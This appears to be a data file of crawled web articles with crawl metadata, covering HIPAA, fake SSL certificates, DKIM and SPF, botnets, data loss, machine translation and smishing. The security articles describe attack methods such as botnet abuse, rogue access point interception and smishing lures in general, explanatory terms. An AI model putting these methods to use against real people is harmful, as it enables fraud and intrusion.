HIPAA, or the Health Insurance Portability and Accountability Act, was enacted in 1996 to reform the health insurance industry. It regulates the movement of insurance plans between employers (“portability”) and extends coverage to those with some pre-existing conditions. Therefore, most health insurance providers or employers that sponsor or co-sponsor insurance plans for their employees must be HIPAA compliant.
HIPAA has four titles which cover a range of topics, but most will associate HIPAA with data privacy and accessibility. The section relating to protected health information (PHI), discussed below, in theory applies to everyone who uses healthcare facilities, as it grants them the right to privacy and gives them power over who can access their health information.
The beginning of the Administrative Simplification Provisions of HIPAA Title II, Subtitle F, reads as follows:
“It is the purpose of this subtitle to improve the Medicare program, the Medicaid program, and the efficiency and effectiveness of the health care system, by encouraging the development of a health information system through the establishment of standards and requirements for the electronic transmission of certain health information”.
The language here is vague, and some believe that it implies that HIPAA only applies to those involved in electronic health transactions, though any of the improvements would apply to healthcare providers, healthcare clearinghouses and providers of health plans. Towards the end of the Administrative Simplification Provisions, the section refers to “standards with respect to the privacy of individually identifiable health information”, finally implying that all data considered to be PHI – irrespective of its form – is covered by HIPAA.
Introduced in 2003, HIPAA’s Privacy Rule made reference to “covered entities” (CEs), detailing the requirement that they were HIPAA compliant without clearly stating what they were. It included health plans, healthcare clearinghouses and healthcare providers “who electronically transmit health information in connection with certain transactions” as those who were considered CE, but did not mention information that was conveyed or stored by other means. This was at odds with the Department for Health and Human Services’ (HSS) own definition of PHI. It is now accepted that the Privacy Rule applies to all identifiable health information, irrespective of its form.
HIPAA also applies to business associates (BAs), any entity that functions on behalf of a CE and may come into contact with PHI. BAs may be involved in data analysis, processing insurance claims, quality assurance or data storage and management, amongst other things.
The partnership requires both parties to sign a business associate agreement (BAA; see 45 CFR 164.504(e)). This contract details how BAs are expected to be HIPAA compliant and how they will safeguard the confidentiality and integrity of the PHI. The BAA also stipulates who will have access to the PHI and how exactly it will be used; BAs cannot use the data for any purpose not covered by the contract. BAs must also be prepared to hand over any PHI to the individual it relates to if they request it. However, CEs are ultimately responsible for ensuring HIPAA compliance.
All subcontracts employed by BAs that may come into contact with PHI are also required to be HIPAA compliant. A further BAA is therefore required between a BA and its contractor, which acts as “satisfactory assurance” that the contractor is aware of its duties under HIPAA.
Healthcare data is often used in research settings, but are researchers required to be HIPAA compliant? If patients have authorized the use of their data for research purposes, CEs may disclose the data to researchers without the need of a BAA. However, the CEs must enter a data use agreement with the researchers that will ensure that researchers safeguard data in a HIPAA-compliant manner.
In the case of public health emergencies – such as the recent COVID-19 pandemic – certain aspects of the Privacy Rule are waived for public health authorities. | <urn:uuid:46012d89-61a6-4893-a7d4-753a0b4d58fb> | CC-MAIN-2022-40 | https://www.hipaanswers.com/who-does-hipaa-apply-to/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00562.warc.gz | en | 0.962259 | 871 | 2.96875 | 3 |
Analysts with UK-based Internet research firm Netcraft have discovered a considerable number of fake SSL certificates in the wild, created to impersonate banks, social networks, payment and ecommerce providers, and so on.
The certificates are used to make users believe that they are on the right website when they are not, allowing attackers to perform Man-in-the-Middle attacks and, thusly, be able to get all the information sent and received by the users and the sites, with both the users and the companies being none the wiser.
As explained by security analyst Paul Mutton:
The fake certificates bear common names which match the hostnames of their targets (e.g. www.facebook.com). As the certificates are not signed by trusted certificate authorities, none will be regarded as valid by mainstream web browser software; however, an increasing amount of online banking traffic now originates from apps and other non-browser software which may fail to adequately check the validity of SSL certificates.
Fake certificates alone are not enough to allow an attacker to carry out a man-in-the-middle attack. He would also need to be in a position to eavesdrop the network traffic flowing between the victim’s mobile device and the servers it communicates with. In practice, this means that an attacker would need to share a network and internet connection with the victim, or would need to have access to some system on the internet between the victim and the server. Setting up a rogue wireless access point is one of the easiest ways for an individual to carry out such attacks, as the attacker can easily monitor all network traffic as well as influence the results of DNS lookups (for example, making www.examplebank.com resolve to an IP address under his control).
Online banking apps for mobile devices are notoriously bad at SSL certificate validation, and as Mutton points out, “both apps and browsers may also be vulnerable if a user can be tricked into installing rogue root certificates through social engineering or malware attacks.”
Among the fake SSL certificates they have discovered was one used to “legitimize” a Facebook phishing page served from a server in Ukraine; one “wildcard” certificate served from a machine in Romania and possibly used to impersonate a variety of Google services; one to impersonate a large Russian bank and one to mimic a Russian payment services provider; one to imitate Apple iTunes.
It’s interesting to note that they have also found a phony certificate used to impersonate GoDaddy’s POP mail server. “In this case, the opportunities could be criminal (capturing mail credentials, issuing password resets, stealing sensitive data) or even state spying, although it is unexpected to see such a certificate being offered via a website,” Mutton pointed out. | <urn:uuid:40639bd6-7865-4692-a8c6-941340f5e45a> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2014/02/13/fake-ssl-certificates-used-to-impersonate-facebook-google-banks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00762.warc.gz | en | 0.948773 | 573 | 2.71875 | 3 |
- Install Docker on Windows 10 and Windows 11 - Fri, Sep 23 2022
- Common BitLocker errors - Wed, Sep 14 2022
- Unlock, suspend, resume, and disable BitLocker with PowerShell - Fri, Sep 9 2022
Since email attacks are becoming more sophisticated every day, the techniques to counter such attacks need to be more robust, too. As you learned in my previous post, the SPF record lists the servers that are authorized to send emails from your domain. DKIM, on the other hand, makes sure that the email message is signed using a digital signature that can be verified by the receiving mail server.
There are two types of From addresses in an email message. The first is mail from (a.k.a. return-path or envelope from), and the second is from address, which is displayed in the email client. The SPF record only validates the return-path address and doesn't care about the from address, which makes it easy for attackers to forge.
What's more, SPF is more fragile than DKIM. Consider a scenario in which an original email message (which was verified by the SPF check) is forwarded to someone else. Since the forwarder is now the new sender of the email message, the return-path will change and the SPF check is performed against the new sending domain, which causes the SPF check to fail. This problem doesn't exist for a DKIM-signed message since the signature is embedded in the message header. So, even if the original email message is forwarded, the DKIM signature is still preserved in the header.
Let's look at an example to understand how SPF and DKIM make a difference. Suppose you send an email to a recipient with a gmail.com address. The following screenshot shows what the email will look like when it is sent from a domain with a correctly configured SPF record.
The mailed-by field in the screenshot indicates that the SPF check was passed, and the email message was indeed sent by an authorized server. Now, let's see what an email message looks like when it is sent from a domain having both SPF and DKIM in place.
Subscribe to 4sysops newsletter!
In this screenshot, you can see the mailed-by and signed-by fields. The latter denotes that the email message was signed using DKIM, and it was verified by Gmail servers that the message is authentic and wasn't changed in transit. | <urn:uuid:df360fe6-915b-4203-8a43-37bb959b6392> | CC-MAIN-2022-40 | https://4sysops.com/archives/dkim-vs-spf/?replytocom=1120119 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00762.warc.gz | en | 0.952424 | 507 | 2.609375 | 3 |
Bots and Botnets
Once one of your devices is infected, it can be turned into a bot. A bot will perform tasks under the control of another program, usually without the need for any human interaction. This is why they can oftentimes be referred to as zombies…and in fact, this is a great way to visualize the threat.
If you have an individual or a criminal organization that has infected millions of devices over the past few years, including computers, mobile phones, and IoT devices, and has turned all of those devices into bots, they now have what’s called a botnet (short for bot network).
They can then send commands to bots in their botnet to perform malicious tasks, including:
- Spread misinformation across social media or ecommerce platforms by creating a mass amount of accounts that they control
- Attack legitimate web services with an overwhelming amount of traffic
- Attack networks
Why do criminals create botnets?
Spreading misinformation and fake reviews
Botnets can be extremely lucrative and surprisingly not that difficult to find. For example, if your competitor wanted to promote their product, but yours had better reviews, they could hire criminal organizations with botnets to create a large number of accounts and leave overwhelmingly positive reviews, which would then trick the e-commerce platform’s algorithm into pushing their product over yours.
Distributed Denial of Service Attacks
Or, if your competitor knew that you were going to launch a very important sale at a specific date and time, they could hire criminals with botnets to attack your website right as the product launch is about to happen, rendering your website completely unusable to legitimate customers trying to purchase your product. If the attack were to be successful, your website could potentially remain offline for hours on end, resulting in frustrated customers that change their mind and never purchase your product.
Botnets can also be used for other purposes, such as to relay spam, distribute computing tasks, mine cryptocurrency, or proxy network traffic.
Botnets can be an effective way to deliver spam, such as email spam. As we’ve talked about, email, in broad terms, is not very secure. Anyone can pretend to be sending email on your behalf. Knowing this, spammers can use their botnets by:
- Contacting their botnet, preparing them to send spam
- Using bot devices as email servers
- Sending recipients spam email
Now multiply by the number of recipients that the spammer is trying to reach, and the number of devices they have in their botnet.
Distribute computing tasks
Because devices in a botnet are completely separate devices, the botnet operator can have them work either independently or together, in order to run computing tasks that could otherwise take a very long time to compute on one single device. This could be machine learning operations, for example, which could cost a significant amount of money if you were to run it at a similar scale in a cloud provider.
Instead, you’re able to use other people’s devices for free to run the same kinds of workloads.
Along similar lines, many botnet operators have started using their bots to mine cryptocurrency on their behalf.
Again, mining has become more and more expensive: you need a lot of powerful hardware to mine any significant amount, which also requires higher electricity usage.
Instead, you can mine from other people’s devices for no cost at all.
Proxy network traffic
One last example of when botnets can be useful is to proxy network traffic.
Proxying traffic can be used to anonymize your actions. While there are many legitimate and practical use cases for doing this, it can also be a tool that criminals use to perform illegal actions.
For example, they may try to attack web resources without proper permission. They may try to access bank accounts of compromised users, and so on.
Every action you take on the web leaves a footprint. If you perform illegal actions and you don’t take the necessary steps to mask your footprint, it makes it quite easy for the authorities to find you.
Instead, if you have access to a botnet, you could relay your actions through those devices instead, which would make it look like those actions were being taken by someone else, potentially on a completely different continent then where you live.
The more bots you can relay the traffic through, the harder it can be to trace back the original requests.
Conclusion for Bots and Botnets
While the list of uses for botnets could go on, these are some examples of why cybercriminals may want to create bots and build bot networks. In the next lesson, we’ll discuss how they use something called Command and Control servers in order to create and control their botnets. | <urn:uuid:c60ce45a-04a9-4e47-a960-6f5b33dd3ab9> | CC-MAIN-2022-40 | https://cybr.com/courses/comptia-security-sy0-601-course/lessons/bots-and-botnets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00762.warc.gz | en | 0.957794 | 983 | 3.15625 | 3 |
Data loss happens more often than you might think. Whether it occurs due to human error or software corruption, it is something that organizations both small and large should be careful navigating. Often, data loss can result in catastrophe, leaving companies and individuals completely vulnerable. So, what can you do to prevent data loss from happening to you? The first step is to better understand some of the different ways in which data loss occurs. You may be surprised by some of them.
You may have chosen to go with a solid-state drive to house the data backups for your company perhaps because of their durability, size, or minimal power consumption. Solid states are more durable because they have no moving components inside of them. This means that you can drop your computer and don’t have to worry about the read/write heads failing or the platters getting damaged. While all these things are true of SSDs, one thing to keep in mind is that they too will fail eventually. There is a common misconception that SSDs are less prone to failures, which unfortunately is not true. It is very common for SSDs to fail logically. They may have a firmware failure, a controller failure, or even fail if you accidentally spill your mug of coffee on the computer. Regardless of if your data backups are on a hard drive or a solid-state drive, you should always have a copy of that data for when the drive inevitably fails.
What happens if you get locked out of your phone, leaving you with no other option than to perform a factory reset to get the phone functioning again? Maybe your laptop is not running at optimal speed and you must factory reset it so it properly functions again. Factory resetting your device completely erases all the data stored on it. This was an intentional design by manufacturers. It was developed so that you can resell your device and not have to worry about your data being accessible to a stranger. One thing most people do not know is that this data is unrecoverable. Therefore, it is extremely important to have all the important data stored on your devices backed up in a different location, like for example, in a cloud-based backup.
Becoming increasingly more common in today’s digital world, ransomware occurs when hackers use malicious software to block you from accessing your data. Many times the hackers are living inside of your network for months, waiting for someone to jot down their password or other personal information and then all of sudden, they’re in and have access to all of your data. They will encrypt everything and demand that you pay them a ransom to recover your data. But here’s the kicker – sometimes they will take your money and run without making your data accessible again. This can be extremely problematic if no backup of the data exists. It can also be an issue if you have your backups on the same computer or network as the one that got hit with ransomware. In most ransomware cases, data recovery is extremely difficult. This is yet another reason having a backup of all your data in a secure location is so crucial.
Cloud-based backup failure
Not all cloud-based backups are created equal. Most people assume that the service they have will automatically back up their data to a different, secure location. This may not always be the case. Cloud-based servers can fall apart in many ways just as hardware and software can. Making sure that your cloud-based backup has been audited is one precaution you can take to ensure your data is being backed up properly.
Employees come and go, something that is inevitable. Occasionally, departing employees will decide to sabotage the company’s data by deleting or stealing it upon termination, leaving the entire company without important data. With a proper backup in place, this can prove to be nothing but a minor bump in the road and your company can be back on track in no time.
Data loss from natural disasters happens more often than you might think. Whether it be water damage from a flood, fire damage, or a power surge, these can all cause detrimental, sometimes even irreversible data loss. You never know when disaster may strike, so make sure that all your backups are up to date and reflect the most current version of the data stored on all your devices.
These are just a few of the ways that data loss can occur. While data loss can be a very scary and daunting event, it doesn’t necessarily have to be. With proper backups in place, significant data loss can often be avoided altogether. In the event that you experience data loss, find a reputable data recovery lab to help you get it back. | <urn:uuid:20fd52a8-f603-45a5-a47f-0c305b2fa0dd> | CC-MAIN-2022-40 | https://www.cpomagazine.com/cyber-security/how-can-data-loss-occur-the-answers-might-surprise-you/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00762.warc.gz | en | 0.953469 | 957 | 2.8125 | 3 |
Machine learning has transformed major aspects of the modern world with great success. Self-driving cars, intelligent virtual assistants on smartphones, and cybersecurity automation are all examples of how far the technology has come.
But of all the applications of machine learning, few have the potential to so radically shape our economy as language translation. The content of language translation is the perfect model for machine learning to tackle. Language operates on a set of predictable rules, but with a degree of variation that makes it difficult for humans to interpret. Machine learning, on the other hand, can leverage repetition, pattern recognition, and vast databases to translate faster than humans can.
There are other compelling reasons that indicate language will be one of the most important applications of machine learning. To begin with, there are over 6,500 spoken languages in the world, and many of the more obscure ones are spoken by poorer demographics who are frequently isolated from the global economy. Removing language barriers through technology connects more communities to global marketplaces. More people speak Mandarin Chinese than any other language in the world, making China’s growing middle class is a prime market for U.S. companies if they can overcome the language barrier.
Let’s take a look at how machine learning is currently being applied to the language barrier problem, and how it might develop in the future.
Neural machine translation
Recently, language translation took an enormous leap forward with the emergence of a new machine translation technology called Neural Machine Translation (NMT). The emphasis should be on the “neural” component because the inner workings of the technology really do mimic the human mind. The architects behind NMT will tell you that they frequently struggle to understand how it comes to certain translations because of how quickly and accurately it delivers them.
“NMT can do what other machine translation methods have not done before – it achieves translation of entire sentences without losing meaning,” says Denis A. Gachot, CEO of SYSTRAN, a language translation technologies company. “This technology is of a caliber that deserves the attention of everyone in the field. It can translate at near-human levels of accuracy and can translate massive volumes of information exponentially faster than we can operate.”
The comparison to human translators is not a stretch anymore. Unlike the days of garbled Google Translate results, which continue to feed late night comedy sketches, NMT is producing results that rival those of humans. In fact, Systran’s Pure Neural Machine Translation product was preferred over human translators 41% of the time in one test.
Martin Volk, a professor at the Institute of Computational Linguistics at the University of Zurich, had this to say about neural machine translation in a 2017 Slator article:
“I think that as computing power inevitably increases, and neural learning mechanisms improve, machine translation quality will gradually approach the quality of a professional human translator over the coming two decades. There will be a point where in commercial translation there will no longer be a need for a professional human translator.”
Gisting to fluency
One telling metric to watch is gisting vs. fluency. Are the translations being produced communicating the gist of an idea, or fluently communicating details?
Previous iterations of language translation technology only achieved the level of gisting. These translations required extensive human support to be usable. NMT successfully pushes beyond gisting and communicates fluently. Now, with little to no human support, usable translations can be processed at the same level of quality as those produced by humans. Sometimes, the NMT translations are even superior.
Quality and accuracy are the main priorities of any translation effort. Any basic translation software can quickly spit out its best rendition of a body of text. To parse information correctly and deliver a fluent translation requires a whole different set of competencies. Volk also said, “Speed is not the key. We want to drill down on how information from sentences preceding and following the one being translated can be used to improve the translation.”
This opens up enormous possibilities for global commerce. Massive volumes of information traverse the globe every second, and quite a bit of that data needs to be translated into two or more languages. That is why successfully automating translation is so critical. Tasks like e-discovery, compliance, or any other business processes that rely on document accuracy can be accelerated exponentially with NMT.
Education, e-commerce, travel, diplomacy, and even international security work can be radically changed by the ability to communicate in your native language with people from around the globe.
Post language economy
Everywhere you look, language barriers are a speed check on global commerce. Whether that commerce involves government agencies approving business applications, customs checkpoints, massive document sharing, or e-commerce, fast and effective translation are essential.
If we look at language strictly as a means of sharing ideas and coordinating, it is somewhat inefficient. It is linear and has a lot of rules that make it difficult to use. Meaning can be obfuscated easily, and not everyone is equally proficient at using it. But the biggest drawback to language is simply that not everyone speaks the same one.
NMT has the potential to reduce and eventually eradicate that problem.
“You can think of NMT as part of your international go-to-market strategy,” writes Gachot. “In theory, the Internet erased geographical barriers and allowed players of all sizes from all places to compete in what we often call a ‘global economy,’ But we’re not all global competitors because not all of us can communicate in the 26 languages that have 50 million or more speakers. NMT removes language barriers, enabling new and existing players to be global communicators, and thus real global competitors. We’re living in the post-internet economy, and we’re stepping into the post-language economy.”
Machine learning has made substantial progress but has not yet cracked the code on language. It does have its shortcomings, namely when it faces slang, idioms, obscure dialects of prominent languages and creative or colorful writing. It shines, however, in the world of business, where jargon is defined and intentional. That in itself is a significant leap forward. | <urn:uuid:584e917b-803f-49de-9bd0-492f49222b56> | CC-MAIN-2022-40 | https://www.cio.com/article/228480/how-machine-learning-can-be-used-to-break-down-language-barriers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00762.warc.gz | en | 0.932915 | 1,277 | 2.890625 | 3 |
Digitize, automate, digitally transform: One and the same? According to half of the companies surveyed in a 2018 Bitkom study, apparently yes. 50 percent of the companies associate the term "digitization" with the "automation of operational business processes". But this is a fallacy - the three terms are fundamentally different and pursue different approaches.
In the following, we have deliberately chosen a narrow concept of digitization in order to highlight the differences between the terms more clearly. In many discussions, the terms digitization, digital transformation and innovation are used synonymously. Thus, for example, digital competence models often go beyond their actual meaning. By digitization, we then also mean new ways of working, business models or new ways of thinking. We would then call this digital transformation. But that's what we'll talk about again at the end of the article - so stay tuned.
Digitization: From analog to digital
Digitizing initially means nothing more than converting analog data into digital data. For example, scanning paper documents from folders and managing them digitally, or using special programs to read information from analog forms and save them on the server. Today, the majority of companies have digital archives. Documents should not only be available digitally, but should also be systematically organized.
An example: An order letter is scanned and stored digitally. A program reads out important data: Address, items ordered, scope of delivery, client, etc. This data is then stored in digital archives. Employees can retrieve the information digitally and use it for the delivery process, for example, manually transferring the ordered products to a delivery bill or copying the contact data to an invoice.
Digitizing a company means restructuring information storage and using technologies to provide data in digitized form.
Automation: Streamline digital processes
Digitization and automation are often regarded as a single entity or even erroneously used as synonymous terms. The fact is, however, that process automation is only conditioned and enabled by digitization, as more complex IT structures are created due to the newly acquired data volumes. Digital processes can thus quickly become confusing, small-scale and error-prone, especially if they have to be operated manually.
Process automation helps to use the abundance of digital data and applications efficiently. Processes are thus streamlined and a company can work more cost-effectively thanks to automation. Simple, repetitive and monotonous tasks are taken over by RPA bots or iPaaS solutions, for example, while employees can concentrate on the core business.
Back to our example: If the order data is now available digitally, employees will no longer have to process it manually in the future. Bots can read the documents, compare the information and automatically initiate the next steps. For example, sending the appropriate product order to the warehouse, printing delivery bills or creating an invoice. The order can be processed more efficiently and error-free in an automated workflow. This saves employees time for more important tasks.
Digital transformation: Creating new technologies
Digital transformation now goes even further, not only streamlining processes to make them more efficient; it calls their very existence into question. Digital transformation means changing technologies and developing them further in innovative ways.
Groundbreaking steps in digital transformation include data storage in clouds or blockchain technology, for example. It is therefore a social, disruptive change and not just a reaction to existing processes that are to be improved. For example, fax became email and email became messenger apps.
To stay with our example, instead of storing analog writing or emails digitally and pushing them later with the help of process automation, a company could develop a completely new method of order creation and become a pioneer in the industry. For example, develop a proprietary app with a new, unprecedented technology that makes the previous process obsolete.
The challenge of digital transformation is about developing innovative solutions and creating completely new processes.
Digitization as the basis for digital transformation & automation
Although digitization, automation and digital transformation are fundamentally different, they are closely linked. Digitization provides digital data for processes that can later be automated. And on the basis of previously existing processes, completely new ones can ultimately be created. So anyone who wants to digitally transform or automate first needs solid digitization as a basis. | <urn:uuid:be492c6c-0cb6-46e9-9f13-bd37185a084e> | CC-MAIN-2022-40 | https://www.botsandpeople.com/blog/automation-digitization-and-digital-transformation-these-are-the-differences | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00162.warc.gz | en | 0.933393 | 865 | 2.625 | 3 |
You’re probably using a mouse today, but you may never buy one again. All the planets are aligning against this humble pointing device.
The computer mouse has long been associated with the PC, but in fact it was invented during the Kennedy administration (in 1963) by Silicon Valley engineers Douglas Engelbart and Bill English. (Click here to see Engelbart demonstrate his invention in San Francisco in late 1968.
The mouse was nothing but a lab rat until the Xerox Star shipped in 1981. Though it was the first time anyone could buy a mouse, few did. The Star was overpriced ($16,000) and poorly marketed. The IBM PC came out that year, too — without a mouse. But when the Apple Macintosh hit in January of 1984, the mouse went mainstream and has been with us ever since.
Now, Gartner analyst Steve Prentice says the mouse’s dominance as the leading pointing devices may be over within 2 to 4 years. And I tend to agree.
That’s quite a prediction. Habits die hard, and our mouse addiction won’t be easy to break. However, several recent developments are slowly changing — or threaten to change — our mouse habit.
1. Apple’s giant trackpad with multi-touch.
Available on MacBook Air and MacBook Pro laptops, this pointing device represents a body blow to the appeal of using a mouse with an Apple mobile computer. The new trackpad is superior because in addition to pointing and clicking, you get gestures, which adds a whole new layer of control.
2. Gaming pointing devices.
Remember when everyone used to play games on a PC using a mouse and keyboard? Neither do I. Console gaming has re-set the bar for gaming input devices, and now even PC games seem to call for joysticks, yolks, steering wheels and other non-mouse input devices.
3. “Brain-reading” devices.
Like the mouse between 1963 and 1981, these devices are still in the lab. But one company, Emotiv Systems, plans to place a $300 headset on the market by the end of this year that lets gamers control some aspects of games with thoughts alone (go here for the demo).
4. Apple iPhone and the “iPhone Killers.”
This newest category of cell phone boots physical keyboards and phone pointing devices (like BlackBerry’s “pearl,” toggle switches or the tracking sticks on some handsets) altogether in favor of full-size touch screens. Although people tend to see iPhone-like devices as replacing keyboards, they’re getting millions of people used to the idea of controlling an entire operating system with a touch screen.
These four factors, and others, will weaken our reliance on mice. But something else will deliver the knock-out blow: The next generations of Windows and Mac OS. Microsoft has already announced that Windows 7 will be optimized for Microsoft Surface-like touch interfaces. And I’m confident that Apple will take advantage of its many patents for “multi-touch” systems and ship an iPhone-like version of Mac OS within the next year or two.
These next-generation operating systems will sport what I call multitouch, physics and gestures (MPG) user interfaces. They represent the next quantum leap in PC usability. And they have no use for a mouse.
The evolution of user interfaces, in fact, can be viewed as a process of getting the user “closer” to objects on-screen. In the beginning, we interfaced with computers on the other side of the glass, handing punch-cards to an operator for processing. Then we typed abstract commands, but directly on a keyboard. Then we used a mouse to simulate the grabbing and selecting, the dragging and dropping of on-screen objects. In the coming fourth phase, we’ll reach out and touch documents, photos and folders directly using iPhone-like user interfaces.
In these four phases of human-computer interaction, the mouse was of use in only one of them. And that era is about to draw to a close.
So take the time to savor every point and every click. It won’t last. The mouse is as good as dead. | <urn:uuid:66a49644-5da4-412f-bac5-a0c7ed43e05c> | CC-MAIN-2022-40 | https://www.datamation.com/trends/the-mouse-is-dead/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00162.warc.gz | en | 0.938015 | 880 | 2.625 | 3 |
What have smishing offenders learned from their phishing email counterparts?
Email-based credential theft remains by far the most common threat we encounter in our data. But SMS-based phishing (commonly known as smishing and including SMS, MMS, RCS, and other mobile messaging types) is a fast-growing counterpart to email phishing. In December 2021, we published an article exploring the ubiquity of email-based phish kits. These toolkits make it straightforward for anyone to set up a phishing operation with little more than a laptop and a credit card. Since then, we’ve tracked their evolution as they gain new functions, including the ability to bypass multifactor authentication.
In this blog post we’re going to look at smishing vs. phishing and what smishing offenders have learned from their email counterparts, as well as some significant differences that remain between the two threats.
Setting the (crime) scene
A modern email phishing setup can be as simple as one person with a computer and access to common cloud-hosted services. But for a smishing operation, the picture is somewhat different. While software smishing kits are available to buy on the dark web, accessing and abusing mobile networks requires a little more investment.
Figure 1. A smishing operation photographed by Greater Manchester Police in the U.K.
Unlike the internet, mobile networks are closed systems. This makes it more difficult for people to anonymously create and send messages across the network. To send a malicious mobile message, a smishing threat actor needs to first gain access to the network, which requires sophisticated exploits or dedicated hardware. “SIM bank” hardware has come down in price recently, but units can still cost hundreds or even thousands of dollars, depending on how many SIM cards are supported and the number of simultaneous mobile connections they can handle. And of course, the criminals also need to pay for active SIM cards to use in their SIM bank. As mobile network operators identify and exclude malicious numbers, new SIM cards are needed, creating ongoing connection costs.
Figure 2. An example of a representative SMS bank for sale online
The physical nature of mobile networks also increases the risk of detection for smishing threat actors. In the UK case noted above, the culprit was arrested in a hotel room. This is not uncommon—network operators can use cell towers to pinpoint where malicious activity is coming from. Smishing offenders therefore need to be highly mobile, moving frequently to avoid getting caught.
Social Engineering and Other Similarities
While there are important structural differences between smishing vs. phishing, when it comes to social engineering these attacks have plenty in common.
Fundamentally, both approaches rely on lures that prey on human psychology. They use tendencies such as loss aversion and biases towards urgency and authority to convince victims to perform an action. Differences between email and mobile messaging formats mean that smishing attempts are shorter and less elaborate than many email lures. But while the execution may vary, the impetus of a missed package or a request from the boss remains the same.
Figure 3. Smishing lures are typically much less complex than phishing messages using the same theme
Smishing and traditional phishing also share similarities in how they target potential victims. In addition to high-volume messaging, both also make use of more specific “spear phishing/smishing” techniques. In these attacks, cyber criminals use detailed research to tailor messages, often targeting higher value people within an organization. As we’ve explored on this blog before, mobile phone numbers can be easily linked to a range of personal information, making them a potent source for spear smishing expeditions. As with their targeting behavior, we also see similar seasonal campaign patterns with both phishing and smishing. Summers are usually slower and activity is often suspended completely during winter holiday periods.
Table 1. Key differences between mobile smishing and email phishing
For many email users, ignoring spam and other basic kinds of malicious message delivery has become second nature. But since mobile messaging is newer, many people still have a high level of trust in the security of mobile communications. So, one of the most important differences between smishing vs. phishing is in our basic susceptibility to attack. Click rates on URLs in mobile messaging are as much as eight times higher than those for email, vastly increasing the odds that a malicious link will be accessed when sent via SMS or other mobile messaging. This responsiveness remains even in markets where services like WhatsApp and Messenger have replaced SMS as the dominant means of mobile text communication. We expect organizations and businesses to send us important messages via SMS and act on them quickly when they arrive.
The prevalence of links over attachments is another important differentiator. Mobile messages are not an effective way to send malicious attachments because many devices limit side-loading and messaging services limit the size of attachments. Instead, most mobile attacks make use of embedded links, even when distributing malware such as FluBot which spread across the U.K. and Europe last year. Email attacks, on the other hand, still see around 20-30% of malicious messages that contain malware attachments.
Personal phone numbers also expose location information in the form of an area code. This can provide other opportunities for location- and language-based tailoring that aren’t present in an email address. Similarly, end users have limited ability to see how the SMS message was routed, seeing only the number it appears to have been sent from. While both mobile numbers and email addresses can be masked, email headers contain much more detailed information about how a message was routed to the recipient and may allow them to spot a malicious message.
As a common point of connection between our personal and professional lives, mobile phones are a high-value target for cyber criminals. A single device may contain accounts giving access to individual and corporate finances, sensitive personal information and confidential commercial documents. In the U.S. last year, smishing rates almost doubled, and that trend is set to continue this year. And while smishing operations have to work with character limits, location constraints and increased overheads, it’s clear that lessons learned from email phishing are helping to maximize their returns. In fact, we believe that the success rate for smishing attacks is likely to be substantially higher overall than for email phishing, though the volume of email attacks remains many times greater.
With that in mind, it’s vital that security awareness training gives mobile threats an appropriate level of coverage for the risk they represent. | <urn:uuid:3eaf0070-c75d-44cf-abce-7d2761c4ff66> | CC-MAIN-2022-40 | https://www.cloudmark.com/en/blog/mobile/smishing-vs-phishing-understanding-differences | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00162.warc.gz | en | 0.94901 | 1,338 | 2.609375 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.